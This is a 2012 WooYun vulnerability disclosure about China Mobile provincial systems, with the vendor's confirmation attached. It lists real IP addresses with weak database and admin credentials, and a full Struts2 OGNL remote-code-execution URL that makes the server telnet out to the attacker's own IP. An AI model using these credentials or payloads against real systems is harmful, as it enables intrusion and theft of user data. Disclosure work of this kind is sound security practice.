当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2012-08965
漏洞标题:
中国移动喜迎香港回归15周年漏洞大礼包
相关厂商:
中国移动
漏洞作者:
shine
提交时间:
2012-06-28 22:33
修复时间:
2012-08-12 22:33
公开时间:
2012-08-12 22:33
漏洞类型:
成功的入侵事件
危害等级:
自评Rank:
5
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2012-06-28: 细节已通知厂商并且等待厂商处理中
2012-07-02: 厂商已经确认,细节仅向厂商公开
2012-07-12: 细节向核心白帽子及相关领域专家公开
2012-07-22: 细节向普通白帽子公开
2012-08-01: 细节向实习白帽子公开
2012-08-12: 细节向公众公开

简要描述:


就再发个礼包吧(正好马上香港回归15周年了,祝祖国强盛!)!都几个月了,自己还没发现修复,损失、遭殃的是用户,用户是无辜的!
以下包含:ftp匿名、struts2远程代码执行、oracle数据库服务器弱口令导致服务器root、后台弱口令、应用安全设计缺陷、目录遍历等,如不准确,同理!

详细说明:


先从湖北移动开始吧(有些移动已经发现并已修复的就不发截图了)!

湖北移动一卡通(还没正式运营):
 http://218.200.101.28:8080   admin  admin
引用: WooYun: 中国移动各地暴露黄色预警,其中重庆、贵阳等系统暴露较为严重,局部地区暴露也不容忽视  与当时的重庆移动是一个产品,感觉产品这么设计不好!
如图:





浙江移动在线客服远程代码执行及目录遍历:
http://122.224.69.139:8002/robot/p4pages/related-question.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22%20telnet%20自己的IP%208888%20%22%29%27%29%28\u0023rt%20\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1
今天早上去中国移动投诉,发现浙江移动系统刚翻新,随意就发现了struts2远程代码执行,到处是问题!
如图:





漏洞证明:

以下是ftp匿名、oracle弱口令引发的问题!

衢州移动oracle弱口令,含整个内部邮件系统的
http://211.140.157.123:1158/em  system   system
引用: WooYun: 东北电网某主力调峰电厂燃料管理系统 
sqlplus system/system@211.140.157.123:1521/orcl









宜宾、自贡移动ftp匿名及oracle弱口令(这个公司行政划分,我是根据系统涉及的用户来定义,不准确谅解!)
这个说明一下:一共是两台数据库服务器。发现第一台时,是3000G-4000G的数据,主要上面有些不利于维护人员的某些影片视频,弄到他qq看了一下,年龄与哥相当,想想一份工作都不容易,怕影响他,再加上服务器后来也关闭了,心一软就没发!
但,第二台上又出现同样的问题,当时只有500G的数据,现在又有了3000G数据,加上数据库比较重要而且都过了几个多月了还没自己发现,还是发出来!


第一台(已修复):218.200.176.187
http://218.200.176.187:1158/em
sqlplus cmis_new/cmis_new@218.200.176.187:1521/orbip
如图:











第二台(应该是第二次发现):218.200.175.74
http://218.200.175.74:1158/em
sqlplus cmis_new/cmis_new@218.200.175.74:1521/orbip
如图:





修复方案:


CNCERT对不住了,又要让你们忙一阵了(主要想起当时,被那什么中国移动的处长耍就很是不爽,哥难道还在乎你那破礼物!)!中国移动安全体系在哪里?
尼玛!发个大礼包写得累死人啊!也没奖励的!

版权声明:转载请注明来源 shine@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-07-02 17:44

厂商回复:

CNVD确认漏洞并复现所述情况,已由CNCERT协调中国移动通信集团公司处置(按集团公司流程,应该是分派工单至各分公司)
shine同学的事件集合rank一般无法用正常评分标准,rank 15

最新状态:

暂无